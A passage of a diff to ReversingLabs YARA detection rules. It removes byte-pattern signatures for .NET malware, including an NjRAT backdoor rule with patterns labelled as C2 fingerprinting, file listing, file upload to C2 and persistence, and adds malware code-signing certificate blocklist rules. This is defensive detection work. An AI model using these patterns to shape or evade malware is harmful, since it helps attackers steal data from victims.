?? ?? A2 25 17 1F - 70 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 18 1F 70 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 19 1F - 6C 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F 69 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1B 1F - 63 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1C 1F 61 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1D 1F - 74 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1E 1F 69 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 09 - } - $send_fingerprint_to_c2_p2 = { - 1F 6F 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0A 1F 6E 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 - 1F 0B 1F 2F 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0C 1F 78 13 ?? 12 ?? 28 ?? ?? ?? ?? - A2 25 1F 0D 1F 2D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0E 1F 77 13 ?? 12 ?? 28 ?? ?? - ?? ?? A2 25 1F 0F 1F 77 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 10 1F 77 13 ?? 12 ?? 28 - ?? ?? ?? ?? A2 25 1F 11 1F 2D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 12 1F 66 13 ?? 12 - ?? 28 ?? ?? ?? ?? A2 25 1F 13 1F 6F 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 14 1F 72 13 - ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 15 1F 6D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 16 1F - 2D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 17 1F 75 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F - 18 1F 72 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 19 1F 6C 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 - 25 1F 1A 1F 65 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 1B 1F 6E 13 ?? 12 ?? 28 ?? ?? ?? - ?? A2 25 1F 1C 1F 63 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 1D 1F 6F 13 ?? 12 ?? 28 ?? - ?? ?? ?? A2 25 1F 1E 1F 64 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 1F 1F 65 13 ?? 12 ?? - 28 ?? ?? ?? ?? A2 25 1F 20 1F 64 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 6F ?? - ?? ?? ?? 11 ?? 08 8E 69 6A 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 25 08 16 08 8E 69 6F - ?? ?? ?? ?? 6F ?? ?? ?? ?? 11 ?? 6F ?? ?? ?? ?? 25 6F ?? ?? ?? ?? 73 ?? ?? ?? ?? 25 - 6F ?? ?? ?? ?? 0D 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 09 13 ?? DE ?? 26 7E ?? ?? ?? ?? 13 - ?? DE ?? 11 - } - $get_files_and_directories_p1 = { - 11 ?? 28 ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 11 ?? 8E 69 17 31 ?? - 11 ?? 17 9A 13 ?? 11 ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 1F 0F 8D - ?? ?? ?? ?? 25 16 1F 44 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 17 1F 69 13 ?? 12 ?? 28 ?? - ?? ?? ?? A2 25 18 1F 72 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 19 1F 65 13 ?? 12 ?? 28 ?? - ?? ?? ?? A2 25 1A 1F 63 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1B 1F 74 13 ?? 12 ?? 28 ?? - ?? ?? ?? A2 25 1C 1F 6F 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1D 1F 72 13 ?? 12 ?? 28 ?? - ?? ?? ?? A2 25 1E 1F 79 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 09 1F 20 13 ?? 12 ?? 28 - ?? ?? ?? ?? A2 25 1F 0A 1F 6F 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0B 1F 66 13 ?? 12 - ?? 28 ?? ?? ?? ?? A2 25 1F 0C 1F 20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0D 11 ?? A2 - 25 1F 0E 72 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 28 - ?? ?? ?? ?? 13 ?? 11 ?? 13 ?? 16 13 ?? 38 ?? ?? ?? ?? 11 ?? 11 ?? 9A 73 ?? ?? ?? ?? - 13 ?? 1F 0B 8D ?? ?? ?? ?? 25 16 11 ?? A2 25 17 11 ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 1F - 16 8D ?? ?? ?? ?? 25 16 1F 4D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 17 1F 4D 13 ?? 12 ?? - 28 ?? ?? ?? ?? A2 25 18 1F 2F 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 19 1F 64 13 ?? 12 ?? - 28 ?? ?? ?? ?? A2 25 1A 1F 64 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1B 1F 2F 13 ?? 12 ?? - 28 ?? ?? ?? ?? A2 25 1C 1F 79 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1D 1F 79 13 ?? 12 - } - $get_files_and_directories_p2 = { - 28 ?? ?? ?? ?? A2 25 1E 1F 79 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F ?? 1F 79 13 ?? 12 - ?? 28 ?? ?? ?? ?? A2 25 1F 0A 1F 20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0B 1F 68 13 - ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0C 1F 68 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0D 1F - 3A 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0E 1F 6D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F - 0F 1F 6D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 10 1F 3A 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 - 25 1F 11 1F 73 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 12 1F 73 13 ?? 12 ?? 28 ?? ?? ?? - ?? A2 25 1F 13 1F 20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 14 1F 74 13 ?? 12 ?? 28 ?? - ?? ?? ?? A2 25 1F 15 1F 74 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 28 ?? ?? ?? - ?? A2 25 18 72 ?? ?? ?? ?? A2 25 19 1F 3C 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F 44 - 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1B 1F 49 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1C 1F 52 - 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1D 1F 3E 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1E 72 ?? - ?? ?? ?? A2 25 1F 09 11 ?? 6F ?? ?? ?? ?? A2 25 1F 0A 72 ?? ?? ?? ?? A2 28 ?? ?? ?? - ?? 13 ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 3F ?? ?? ?? ?? 11 ?? 13 ?? 16 13 ?? 38 - ?? ?? ?? ?? 11 ?? 11 ?? 9A 73 ?? ?? ?? ?? 13 ?? 1F 0C 8D ?? ?? ?? ?? 25 16 11 ?? A2 - 25 17 11 ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 1F 16 8D ?? ?? ?? ?? 25 16 1F 4D 13 ?? 12 ?? - 28 ?? ?? ?? ?? A2 25 17 1F 4D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 18 1F 2F 13 ?? 12 ?? - 28 ?? ?? ?? ?? A2 25 19 1F 64 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F 64 13 ?? 12 ?? - 28 ?? ?? ?? ?? A2 25 1B 1F 2F 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1C 1F 79 13 ?? 12 ?? - 28 ?? ?? ?? ?? A2 25 1D 1F 79 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1E 1F 79 13 ?? 12 ?? - 28 ?? ?? ?? ?? A2 25 1F 09 1F 79 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0A 1F 20 13 - } - $get_files_and_directories_p3 = { - 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0B 1F 68 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0C 1F 68 - 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0D 1F 3A 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0E - 1F 6D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0F 1F 6D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 - 1F 10 1F 3A 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 11 1F 73 13 ?? 12 ?? 28 ?? ?? ?? ?? - A2 25 1F 12 1F 73 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 13 1F 20 13 ?? 12 ?? 28 ?? ?? - ?? ?? A2 25 1F 14 1F 74 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 15 1F 74 13 ?? 12 ?? 28 - ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 25 18 72 ?? ?? ?? ?? A2 25 19 1F 46 - 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F 49 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1B 1F 4C - 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1C 1F 45 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1D 72 ?? - ?? ?? ?? A2 25 1E 11 ?? 6F ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 09 72 ?? - ?? ?? ?? A2 25 1F 0A 11 ?? 6F ?? ?? ?? ?? A2 25 1F 0B 72 ?? ?? ?? ?? A2 28 ?? ?? ?? - ?? 13 ?? 11 ?? 17 58 13 ?? 11 ?? 11 ?? 8E 69 3F ?? ?? ?? ?? 1F 0B 8D ?? ?? ?? ?? 25 - 16 11 ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 11 ?? 8E 69 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 - 25 19 1F 20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F 44 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 - 25 1B 1F 69 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1C 1F 72 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 - 25 1D 1F 28 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1E 1F 73 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 - 25 1F 09 1F 29 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0A 72 ?? ?? ?? ?? A2 28 ?? ?? ?? - ?? 13 ?? 1F 0B 8D ?? ?? ?? ?? 25 16 11 ?? A2 25 17 72 ?? ?? ?? ?? A2 25 18 11 ?? 8E - 69 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 19 1F 20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F - } - $upload_file_to_c2_p1 = { - 11 ?? 28 ?? ?? ?? ?? 13 ?? 72 ?? ?? ?? ?? 13 ?? 11 ?? 8E 69 17 3E ?? ?? ?? ?? 11 ?? - 17 9A 17 8D ?? ?? ?? ?? 25 16 1F 22 9D 6F ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 39 - ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 28 ?? ?? ?? ?? 13 ?? 02 28 ?? ?? ?? ?? - 13 ?? 1F 0D 8D ?? ?? ?? ?? 25 16 1F 75 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 17 1F 40 13 - ?? 12 ?? 28 ?? ?? ?? ?? A2 25 18 11 ?? A2 25 19 1F 40 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 - 25 1A 28 ?? ?? ?? ?? A2 25 1B 1F 7C 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1C 28 ?? ?? ?? - ?? A2 25 1D 1F 40 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1E 11 ?? A2 25 1F 09 1F 40 13 ?? - 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0A 1F 32 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0B 1F 40 - 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0C 11 ?? 28 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 13 ?? - 02 02 7B ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 26 1F 1E 8D ?? ?? ?? ?? 25 16 1F 66 13 ?? - 12 ?? 28 ?? ?? ?? ?? A2 25 17 1F 69 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 18 1F 6C 13 ?? - 12 ?? 28 ?? ?? ?? ?? A2 25 19 1F 65 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F 5B 13 ?? - 12 ?? 28 ?? ?? ?? ?? A2 25 1B 11 ?? A2 25 1C 1F 5D 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 - 1D 1F 20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1E 1F 69 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 - 1F 09 1F 73 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0A 1F 20 13 ?? 12 ?? 28 - } - $upload_file_to_c2_p2 = { - A2 25 1F 0B 1F 75 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0C 1F 70 13 ?? 12 ?? 28 ?? ?? - ?? ?? A2 25 1F 0D 1F 6C 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 0E 1F 6F 13 ?? 12 ?? 28 - ?? ?? ?? ?? A2 25 1F 0F 1F 61 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 10 1F 64 13 ?? 12 - ?? 28 ?? ?? ?? ?? A2 25 1F 11 1F 65 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 12 1F 64 13 - ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 13 1F 20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 14 1F - 74 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 15 1F 6F 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F - 16 1F 20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 17 1F 73 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 - 25 1F 18 1F 65 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 19 1F 72 13 ?? 12 ?? 28 ?? ?? ?? - ?? A2 25 1F 1A 1F 76 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 1B 1F 65 13 ?? 12 ?? 28 ?? - ?? ?? ?? A2 25 1F 1C 1F 72 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1F 1D 1F 2E 13 ?? 12 ?? - 28 ?? ?? ?? ?? A2 28 ?? ?? ?? ?? 13 ?? 38 ?? ?? ?? ?? 1F 0F 8D ?? ?? ?? ?? 25 16 1F - 66 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 17 1F 69 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 18 1F - 6C 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 19 1F 65 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1A 1F - 20 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1B 1F 6E 13 ?? 12 ?? 28 ?? ?? ?? ?? A2 25 1C 1F - } + condition: + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "SERVICE STREAM LIMITED" and pe.signatures[i].serial=="01:68:36:31:1f:c3:9f:bb:8e:6f:30:8b:b0:3c:c2:b3" and 1602547200<=pe.signatures[i].not_after) +} +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_435Abf46053A0A445C54217A8C233A7F : INFO FILE +{ + meta: + description = "Certificate used for digitally signing malware." + author = "ReversingLabs" + id = "538d7405-be17-519e-beb5-fbef3beaedd3" + date = "2023-11-08" + modified = "2023-11-08" + reference = "ReversingLabs" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L11974-L11990" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "839f55e8fe7a86aad406e657fdef48925543b5d3884927104fd3786444a8fccc" + score = 75 + quality = 90 + tags = "INFO, FILE" + status = "RELEASED" + sharing = "TLP:WHITE" + category = "INFO" + importance = 25 condition: - uint16(0)==0x5A4D and ( all of ($send_fingerprint_to_c2_p*)) and ( all of ($get_files_and_directories_p*)) and ( all of ($upload_file_to_c2_p*)) + uint16(0)==0x5A4D and for any i in (0..pe.number_of_signatures) : (pe.signatures[i].subject contains "OOO Kodemika" and pe.signatures[i].serial=="43:5a:bf:46:05:3a:0a:44:5c:54:21:7a:8c:23:3a:7f" and 1616976000<=pe.signatures[i].not_after) } -rule REVERSINGLABS_Bytecode_MSIL_Backdoor_Njrat : TC_DETECTION MALICIOUS MALWARE FILE +import "pe" + +rule REVERSINGLABS_Cert_Blocklist_B2F9C693A2E6634565F63C79B01Dd8F8 : INFO FILE { meta: - description = "Yara rule that detects NjRAT backdoor." + description = "Certificate used for digitally signing malware." author = "ReversingLabs" - id = "578c813f-4bba-52cd-bcc7-4de2c3943cf7" - date = "2024-07-31" - modified = "2024-07-31" + id = "c094666a-0bb3-5cb6-82a8-3074b9eed32b" + date = "2023-11-08" + modified = "2023-11-08" reference = "ReversingLabs" - source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/yara/backdoor/ByteCode.MSIL.Backdoor.NjRAT.yara#L1-L266" - license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/5cd6c7eb3df8e809418e3d5b6d2c9f09a7c2dfd0/LICENSE" - logic_hash = "eeecf90965e6952d8b9efc9d1e96eaa47709b1d69fc7d435f4aebaaf0191f317" + source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/yara/certificate/blocklist.yara#L11992-L12010" + license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/279bfceaa87bd83edfb1406325e3a6f4e8d46cca/LICENSE" + logic_hash = "f5ec67c082be21a2495ef90fd0a6d4fc4b1379c4903dcc051d39cf1913d5cf20" score = 75 quality = 90 - tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE" + tags = "INFO, FILE" status = "RELEASED" sharing = "TLP:WHITE" - category = "MALWARE" - tc_detection_type = "Backdoor" - tc_detection_name = "NjRAT" - tc_detection_factor = 5 + category = "INFO" importance = 25 - strings: - $persistence_mechanism_v1_p1 = { - 00 20 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 2C ?? 7E ?? ?? ?? ?? 7E ?? ?? ?? - ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 28 ?? - ?? ?? ?? 73 ?? ?? ?? ?? 28 ?? ?? ?? ?? 2C ?? 16 2B ?? 17 13 ?? 11 ?? 39 ?? ?? ?? ?? - 00 28 ?? ?? ?? ?? 18 28 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? - 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 7E ?? ?? ?? ?? 28 ?? - ?? ?? ?? 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 7E ?? ?? ?? - ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? - ?? ?? ?? 17 28 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 7E ?? ?? - ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 28 ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 0A - 00 28 ?? ?? ?? ?? 00 28 ?? ?? ?? ?? DE ?? 00 00 00 1B 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 - 72 ?? ?? ?? ?? A2 00 11 ?? 17 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 00 11 ?? 18 72 ?? ?? - ?? ?? A2 00 11 ?? 19 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? A2 00 11 ?? 1A 72 ?? ?? ?? ?? A2 - 00 11 ?? 28 ?? ?? ?? ?? 16 16 15 28 ?? ?? ?? ?? 26 DE ?? 25 28 ?? ?? ?? ?? 0B 00 28 - ?? ?? ?? ?? DE ?? 00 7E ?? ?? ?? ?? 13 ?? 11 ?? 39 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 6F - ?? ?? ?? ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? - ?? ?? 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 - DE ?? 25 28 ?? ?? ?? ?? 0C 00 28 ?? ?? ?? ?? DE ?? 00 00 7E ?? ?? ?? ?? 6F ?? ?? ?? - ?? 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 17 6F ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 7E - ?? ?? ?? ?? 6F ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DE ?? 25 - } - $persistence_mechanism_v1_p2 = { - 28 ?? ?? ?? ?? 0D 00 28 ?? ?? ?? ?? DE ?? 00 00 7E ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 00 - 28 ?? ?? ?? ?? 18 28 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 1D 28 ?? ?? ?? ?? - 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 17 28 ?? ?? ?? ?? 00 1D - 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 19 73 ?? - ?? ?? ?? 80 ?? ?? ?? ?? DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE ?? 00 00 - 7E ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 72 ?? ?? ?? ?? 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 16 16 - 15 28 ?? ?? ?? ?? 26 00 7E ?? ?? ?? ?? 13 ?? 11 ?? 2C ?? 00 28 ?? ?? ?? ?? 18 28 ?? - ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE ?? 00 00 7E ?? ?? ?? - ?? 13 ?? 11 ?? 39 ?? ?? ?? ?? 72 ?? ?? ?? ?? 13 ?? 7E ?? ?? ?? ?? 13 ?? 18 13 ?? 28 - ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 6F ?? ?? ?? ?? 13 ?? 28 ?? ?? ?? ?? 13 ?? - 11 ?? 13 ?? 16 13 ?? 38 ?? ?? ?? ?? 11 ?? 11 ?? 9A 13 ?? 00 28 ?? ?? ?? ?? 11 ?? 11 - ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 00 11 ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? - 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? ?? ?? DE ?? 00 00 11 ?? 72 ?? ?? ?? ?? - 11 ?? 28 ?? ?? ?? ?? 73 ?? ?? ?? ?? 13 ?? 11 ?? 72 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 11 - ?? 72 ?? ?? ?? ?? 11 ?? 11 ?? 28 ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 11 ?? 72 ?? ?? ?? ?? - 11 ?? 28 ?? ?? ?? ?? 17 8C ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 11 ?? 6F ?? ?? ?? ?? 00 11 - ?? 11 ?? 28 ?? ?? ?? ?? 11 ?? 28 ?? ?? ?? ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 - } - $connect_v1_p1 = { - 00 16 80 ?? ?? ?? ?? 20 D0 07 00 00 28 ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 0B 00 07 13 ?? - 11 ?? 28 ?? ?? ?? ?? 00 00 00 7E ?? ?? ?? ?? 14 (FE | 01) ?? 16 (FE | 01) ?? 13 ?? 11 - ?? 2C ?? 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 14 80 ?? ?? ?? ?? DE ?? 25 28 ?? ?? ?? - ?? 0C 00 28 ?? ?? ?? ?? DE ?? 00 00 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 00 DE ?? 25 28 - ?? ?? ?? ?? 0D 00 28 ?? ?? ?? ?? DE ?? 00 DE ?? 25 28 ?? ?? ?? ?? 13 ?? 00 28 ?? ?? - ?? ?? DE ?? 00 00 73 ?? ?? ?? ?? 80 ?? ?? ?? ?? 73 ?? ?? ?? ?? 80 ?? ?? ?? ?? 7E ?? - ?? ?? ?? 20 00 20 03 00 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 20 00 20 03 00 6F ?? ?? ?? - ?? 00 7E ?? ?? ?? ?? 6F ?? ?? ?? ?? 20 10 27 00 00 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? - 6F ?? ?? ?? ?? 20 10 27 00 00 6F ?? ?? ?? ?? 00 7E ?? ?? ?? ?? 14 72 ?? ?? ?? ?? 18 - 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? - ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 17 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 8C ?? ?? ?? ?? A2 - 00 11 ?? 14 14 14 17 28 ?? ?? ?? ?? 26 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? - 28 ?? ?? ?? ?? 80 ?? ?? ?? ?? 17 80 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 26 00 - 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 16 28 ?? - ?? ?? ?? 13 ?? 11 ?? 2C ?? 11 ?? 7F ?? ?? ?? ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? - ?? ?? ?? 13 ?? 2B ?? 00 11 ?? 72 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 28 ?? ?? - ?? ?? 28 ?? ?? ?? ?? 13 ?? 12 ?? 28 ?? ?? ?? ?? 72 ?? ?? ?? ?? 28 ?? ?? ?? ?? 13 - } - $connect_v1_p2 = { - 00 1F ?? 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 1B 8D ?? ?? ?? ?? 13 ?? 11 ?? 16 11 ?? A2 00 - 11 ?? 17 7E ?? ?? ?? ?? A2 00 11 ?? 18 72 ?? ?? ?? ?? A2 00 11 ?? 19 7E ?? ?? ?? ?? - A2 00 11 ?? 1A 72 ?? ?? ?? ?? A2 00 11 ?? 28 ?? ?? ?? ?? A2 00 11 ?? 17 7E ?? ?? ?? - ?? A2 00 11 ?? 18 72 ?? ?? ?? ?? A2 00 11 ?? 19 7E ?? ?? ?? ?? A2 00 11 ?? 1A 72 ?? - ?? ?? ?? A2 00 11 ?? 1B 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 1C 72 ?? ?? ?? ?? - A2 00 11 ?? 1D 7E ?? ?? ?? ?? 28 ?? ?? ?? ?? A2 00 11 ?? 1E 72 ?? ?? ?? ?? A2 00 11 - ?? 1F ?? 7E ?? ?? ?? 